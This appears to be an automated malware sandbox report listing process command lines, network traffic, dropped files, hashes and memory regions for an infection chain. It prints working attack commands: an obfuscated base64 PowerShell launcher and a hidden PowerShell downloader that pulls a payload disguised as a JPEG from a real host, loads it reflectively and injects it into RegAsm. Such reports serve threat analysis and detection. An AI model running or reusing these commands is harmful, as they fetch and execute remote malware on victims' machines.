〷HM⤏ ꒼ ⛲ ⫰ 〷YQB0⤏ ꒼ ⛲ ⫰ 〷Gk⤏ ꒼ ⛲ ⫰ 〷dgBh⤏ ꒼ ⛲ ⫰ 〷GQ⤏ ꒼ ⛲ ⫰ 〷bw⤏ ꒼ ⛲ ⫰ 〷n⤏ ꒼ ⛲ ⫰ 〷Ck⤏ ꒼ ⛲ ⫰ 〷KQ⤏ ꒼ ⛲ ⫰ 〷g⤏ ꒼ ⛲ ⫰ 〷H0⤏ ꒼ ⛲ ⫰ 〷I⤏ ꒼ ⛲ ⫰ 〷B9⤏ ꒼ ⛲ ⫰ 〷⤏ ꒼ ⛲ ⫰ 〷==';$OWjuxD = [system.Text.encoding]::Unicode.GetString( [system.Convert]::Frombase64String( $Codigo.replace('⤏ ꒼ ⛲ ⫰ 〷','A') ) );powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$link = 'http://servidorwindows.ddns.com.br/Files/vbs.jpeg'; $webClient = New-Object System.Net.WebClient; try { $downloadedData = $webClient.DownloadData($link) } catch { Write-Host 'Failed To download data from $link' -ForegroundColor Red; exit }; if ($downloadedData -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($downloadedData); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('dnlib.IO.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.NNJ/001/05.98.09.54//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm','desativado')) } }"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 138.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 138.201.86.20.in-addr.arpa | udp |
| TR | 45.90.89.50:80 | 45.90.89.50 | tcp |
| US | 8.8.8.8:53 | 50.89.90.45.in-addr.arpa | udp |
| US | 8.8.8.8:53 | servidorwindows.ddns.com.br | udp |
| BR | 191.55.76.236:80 | servidorwindows.ddns.com.br | tcp |
| US | 8.8.8.8:53 | 236.76.55.191.in-addr.arpa | udp |
| TR | 45.90.89.50:80 | 45.90.89.50 | tcp |
| US | 8.8.8.8:53 | host.wemnbbsweoipmngbyutrdcunbgrtjeroendns.pro | udp |
| US | 192.3.176.174:26734 | host.wemnbbsweoipmngbyutrdcunbgrtjeroendns.pro | tcp |
| US | 8.8.8.8:53 | 174.176.3.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | geoplugin.net | udp |
| NL | 178.237.33.50:80 | geoplugin.net | tcp |
| US | 8.8.8.8:53 | 50.33.237.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 86.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 73.190.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 79.190.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 77.190.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.227.111.52.in-addr.arpa | udp |
Files
memory/2144-0-0x000000007179E000-0x000000007179F000-memory.dmp
memory/2144-1-0x00000000028A0000-0x00000000028D6000-memory.dmp
memory/2144-3-0x0000000004FC0000-0x00000000055E8000-memory.dmp
memory/2144-2-0x0000000071790000-0x0000000071F40000-memory.dmp
memory/2144-4-0x0000000071790000-0x0000000071F40000-memory.dmp
memory/2144-5-0x0000000004F30000-0x0000000004F52000-memory.dmp
memory/2144-6-0x00000000057A0000-0x0000000005806000-memory.dmp
memory/2144-7-0x0000000005880000-0x00000000058E6000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ey2scfrq.sen.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/2144-17-0x00000000059F0000-0x0000000005D44000-memory.dmp
memory/2144-18-0x0000000005E70000-0x0000000005E8E000-memory.dmp
memory/2144-19-0x0000000005EC0000-0x0000000005F0C000-memory.dmp
memory/2144-20-0x0000000006E40000-0x0000000006E72000-memory.dmp
memory/2144-22-0x0000000071790000-0x0000000071F40000-memory.dmp
memory/2144-21-0x000000006E050000-0x000000006E09C000-memory.dmp
memory/2144-23-0x000000006E1B0000-0x000000006E504000-memory.dmp
memory/2144-33-0x0000000006470000-0x000000000648E000-memory.dmp
memory/2144-34-0x0000000071790000-0x0000000071F40000-memory.dmp
memory/2144-35-0x0000000006F30000-0x0000000006FD3000-memory.dmp
memory/2144-36-0x0000000071790000-0x0000000071F40000-memory.dmp
memory/2144-37-0x0000000007860000-0x0000000007EDA000-memory.dmp
memory/2144-38-0x00000000071E0000-0x00000000071FA000-memory.dmp
memory/2144-39-0x0000000007240000-0x000000000724A000-memory.dmp
memory/2144-40-0x0000000007460000-0x00000000074F6000-memory.dmp
memory/2144-41-0x00000000073C0000-0x00000000073D1000-memory.dmp
memory/2144-42-0x00000000073F0000-0x00000000073FE000-memory.dmp
memory/2144-43-0x0000000007400000-0x0000000007414000-memory.dmp
memory/2144-44-0x0000000007440000-0x000000000745A000-memory.dmp
memory/2144-45-0x0000000007430000-0x0000000007438000-memory.dmp
\??\c:\Users\Admin\AppData\Local\Temp\r50m1r4v\r50m1r4v.cmdline
| MD5 | 9294ca5cf2fb2c804e55cd200c85f8d4 |
| SHA1 | 82546ffdba512041d72a3dd0fde1a30b87a6d42f |
| SHA256 | e1b4b1ae3e601a6a97dc6fb1ac9f180743b08321ca137541a883e1d16b2bc27e |
| SHA512 | 1f63dabf47b4df5de83b43c75455e3f0645e2bbfce93d4c29d7c628af8fdc93a3a790d280e05b8348c781362659ca542ecb5a395169a264ed7499df144e77393 |
\??\c:\Users\Admin\AppData\Local\Temp\r50m1r4v\r50m1r4v.0.cs
| MD5 | c8323e21fb3e0a43c3296686b3399df5 |
| SHA1 | 6acf09f8b65000472a3011fa65600dbe223ce44e |
| SHA256 | 82cde5c0e8c3ebd12df77f91b0c4fb50c5b9448078a890907be15146d58a4922 |
| SHA512 | 6c25e0c9ba56534963d10969fe65a7dd74c2e5f3f848c197e6b71699b71086f6920124e83a23e3f43894330c7a1feef2d7b39fe576eaf465e7ee78277083dd91 |
\??\c:\Users\Admin\AppData\Local\Temp\r50m1r4v\CSC837F1182E94D48AEA9102F1B3918AD2F.TMP
| MD5 | 424be4890f047e877a72f2fcdc02052f |
| SHA1 | 9029182115695061a25c9bac8f8dee23eb87895a |
| SHA256 | e98dc1419816903521b708bccbfb725b92b46bbb107b3549962fa50e592c671e |
| SHA512 | ebf9a26bd0588f4885ab0e8227a4600d84e1d15030947240f135b354ef6b9a78d0d43f2de697a986072af5a9bbecbf1c92dde6b9e64d193871ddeb96f5cd4907 |
C:\Users\Admin\AppData\Local\Temp\RESA73C.tmp
| MD5 | c23187fde1aa497f66f750c50d9e24c1 |
| SHA1 | 9bf80994a55db5f13ff2b633cfbac62d3cd8a2c1 |
| SHA256 | 3bbf6e025e47599251619f704141c7dc6bd80b11a0f1156954f19042f14cdb3b |
| SHA512 | 86f0ce86846baa1529eab37460b66d08a3efc8bc8e7ccf4ef39296436d32a438813b3d0f1cf05e08768f18930aa89d70b021095b02788ad27eb90dc772b71d19 |
C:\Users\Admin\AppData\Local\Temp\r50m1r4v\r50m1r4v.dll
| MD5 | 0d3c2a7ecf1d363ebfd7ec8bd682524e |
| SHA1 | 471081bed0e390dd68957715111f2b56a9f246ab |
| SHA256 | dd4beb728ecd024701f6c44c61df3ad8a48a51042a2e35f59862cbe0810cfb6b |
| SHA512 | 0490185291895ebfbdb7f310a979fcaecad9e6aa2dd97be3127b903da1c94d94690ab0ff26851c57b8210ffc98ebaf190162af87640a6dfd793a2968b4d791f7 |
memory/2144-58-0x0000000007430000-0x0000000007438000-memory.dmp
memory/2144-64-0x0000000007700000-0x0000000007722000-memory.dmp
memory/2144-65-0x0000000008490000-0x0000000008A34000-memory.dmp
C:\Users\Admin\AppData\Roaming\instantflowercaseneedbeautygirlsh.vBS
| MD5 | ccde7ef0e90a5a62394fafe77c7eff7e |
| SHA1 | 197cbc0c7ab873fd02bf2b8a3a17d7b0f44bb003 |
| SHA256 | cc67b8be8fc325cf915731f69dd2c36d77c12ea1819726e70ed57170fafd1722 |
| SHA512 | 047baeb2e3d183605346025f86df3042f596bd2505adf7597ffb2fd972acf9db6bd62d03a3f9b52c9a9ffabca743d5e3c359a5a12fc79a3d6e93fdc8d7930dfe |
memory/2144-71-0x0000000071790000-0x0000000071F40000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
| MD5 | 9faf6f9cd1992cdebfd8e34b48ea9330 |
| SHA1 | ae792d2551c6b4ad5f3fa5585c0b0d911c9f868e |
| SHA256 | 0c45700b2e83b229e25383569b85ddc0107450c43443a11633b53daf1aaed953 |
| SHA512 | 05b34627f348b2973455691bcb7131e4a5236cfece653d22432746ccd14d211b9b279f0913fbd7bb150f00eb2f2c872f4f5518f3903e024699fd23c50d679e97 |
memory/4072-73-0x0000000005A00000-0x0000000005D54000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | fda98a2b92656d6fe14b65600952299b |
| SHA1 | 50e9de875ab9041c859594c043c16e152c5bba0e |
| SHA256 | cb158206a372628d93229d3e72f07bf9462a08ef81a7ff1066e5676ba53d91d6 |
| SHA512 | 1b6cde987934afac8cd32c4d8c51d44b35df26c9dd850b7cfe3ac9e0b29aeff421cf70dd3ddf91d59fab4dc191f46ba8c14bccc882bd50d386faccff9ad7a28f |
memory/4472-93-0x00000000079D0000-0x0000000007AF2000-memory.dmp
memory/4472-94-0x0000000007B90000-0x0000000007C2C000-memory.dmp
memory/3168-95-0x0000000000400000-0x0000000000482000-memory.dmp
memory/3168-97-0x0000000000400000-0x0000000000482000-memory.dmp
memory/3168-99-0x0000000000400000-0x0000000000482000-memory.dmp
memory/3168-103-0x0000000000400000-0x0000000000482000-memory.dmp
memory/3168-100-0x0000000000400000-0x0000000000482000-memory.dmp
memory/3168-104-0x0000000000400000-0x0000000000482000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 45a6e81ff8cedd55182c42ace7c6c944 |
| SHA1 | 598918424c6a8f8e9360debfbf75aeee8763bc37 |
| SHA256 | 4cd820679151892257c032da238ed9fdad3e4a242746c277abd472a3719fdaf6 |
| SHA512 | 256805b70e9340006c9e3fe11b9f080bc861397ed0a8d1dddf57e8018df8e7edeb0f00d4e0005f4c5792c0ae81df4f1458f8976fc298e4fe9a91a1584acde035 |
memory/3168-107-0x0000000000400000-0x0000000000482000-memory.dmp
memory/3168-108-0x0000000000400000-0x0000000000482000-memory.dmp
memory/3168-109-0x0000000000400000-0x0000000000482000-memory.dmp
memory/3168-115-0x0000000000400000-0x0000000000482000-memory.dmp
memory/3168-116-0x0000000000400000-0x0000000000482000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\word\logs.dat
| MD5 | b76000e2a8c9f998c7dbf979d7dae32b |
| SHA1 | 8c65bbf2bf7e21426e29d096e495ed59f8515837 |
| SHA256 | d3d8b164a3288ffb049833b7da046575797e7b609d1919b9800bfc16283375b9 |
| SHA512 | 51bd26edc6eea9536b8ad1c97652ac54311bde302f5a417befe2ea42d097bcba0b188c64e2ae3ec9965dd9ecb286d6f7ca4754be76bcbd7ebe9ff7ae6236353a |
memory/3168-123-0x0000000000400000-0x0000000000482000-memory.dmp
memory/3168-124-0x0000000000400000-0x0000000000482000-memory.dmp
memory/3168-132-0x0000000000400000-0x0000000000482000-memory.dmp
memory/3168-131-0x0000000000400000-0x0000000000482000-memory.dmp
memory/3168-139-0x0000000000400000-0x0000000000482000-memory.dmp
memory/3168-140-0x0000000000400000-0x0000000000482000-memory.dmp